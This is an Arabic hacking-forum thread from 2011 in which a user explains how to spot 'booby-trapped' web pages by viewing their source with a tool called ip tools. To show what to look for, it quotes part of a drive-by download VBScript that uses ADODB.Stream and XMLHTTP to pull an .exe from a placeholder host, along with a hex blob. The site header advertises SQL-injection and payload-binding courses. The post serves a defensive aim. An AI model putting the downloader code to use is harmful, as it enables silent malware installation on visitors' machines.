1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

منع اى هكر من اختراق جهازك عن طريق الصفحات الملغمة

الموضوع في 'كشف الدمج والتلغيم' بواسطة mouadh kouki, بتاريخ ‏8 نوفمبر 2011.

كاتب الموضوع : mouadh kouki المشاهدات : 3,406 الردود : 2 ‏8 نوفمبر 2011
حالة الموضوع:
مغلق
  1. غير متصل

    mouadh kouki
    rank
    Developer

    عضو منذ:
    ‏8 نوفمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    [​IMG]
    اسم البرنامج : ip tools
    تحميل البرنامج :
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]

    فكرة البرنامج

    البرنامج جميل جدا يطلعلك كود الصفحة لنفرض ان شخص يريد ان يخترقك يرسل لك رابط صفحة ملغومة او قد تشك فى انها ملغومة ماذا نفعل
    ناخذ الرابط ونضعه فى خانة URL
    ونظغط start راح يطلعلك كود الصفحة خلال ثوانى فقط

    [​IMG]
    اذا وجدت فى الصفحة كود مثل هذا

    هذا كود من صفحة ملغمة استخدمها فى الاختراق

    ' due to how ajax works, the file MUST be within the same local domain
    dl = "http://xxx.xxx/xxx.exe"
    ' create adodbstream object
    Set df = document.createElement("object")
    df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
    str="Microsoft.XMLHTTP"
    Set x = df.CreateObject(str,"")


    وهو جزء من كود لفتح ملف تنفيدى تلقائي فى الجهاز عند الدخول الى الموقع
    مايهمنا فى الكود هو
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]

    .exe
    يعني ملف تنفيدى
    وامتداد scr ايضا يكون مثله
    والهكر بيحط بدل منوا رابط الباتش ( السيرفر ) لكي يفتح باتش فى جهازك عند دخول الصفحة


    طيب هذه بعض الطرق والحيل هناك بعض الطرق الاخرى وهى ان يقوم الهكر بتحويل الباتش الى صفحة html يعني ما راح يطلع معنا كود .exe زى الى شفناه فوق ولكن هذه طريقة غبيه وكشفها سهل جدا اسهل ما تتصورون
    عندما يحول الهكر الباتش الى صفحة html يتحول اكود الصفحة لكود مثل هذا
    الكود

    F44454641554C545F434841525345540A466F6E742E436F6C
    6F72070C636C57696E646F77546578740B466F6E742E48656
    967687402F609466F6E742E4E616D65060D4D532053616E73
    2053657269660A466F6E742E5374796C650B000E4F6C64437
    2656174654F726465720908506F736974696F6E070E706F53
    637265656E43656E746572084F6E437265617465070A466F7
    26D4372656174650D506978656C73506572496E636802600A
    54657874486569676874020D0006544C6162656C064C61626
    56C31044C656674020A03546F700231055769647468023106
    486569676874020D0743617074696F6E060953697465204E6
    16D65000006544C6162656C064C6162656C32044C65667402
    0A03546F700203055769647468023206486569676874020D0

    [​IMG]

    ارجو اخذ الموضوع بعين الاعتبار فلقد اصبحت طريقة الاختراق بصفحات الملغمة سهلة


    [​IMG]
    [​IMG]

     


    جاري تحميل الصفحة...
  2. غير متصل

    MR.BLAMS
    rank
    Developer

    عضو منذ:
    ‏17 سبتمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: منع اى هكر من اختراق جهازك عن طريق الصفحات الملغمة

    بارك الله فيك يابطل ^:"​
     


  3. غير متصل

    sahdy18
    rank
    Developer

    عضو منذ:
    ‏14 نوفمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الوظيفة:
    طالب

    رد: منع اى هكر من اختراق جهازك عن طريق الصفحات الملغمة

    بارك الله فيك
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...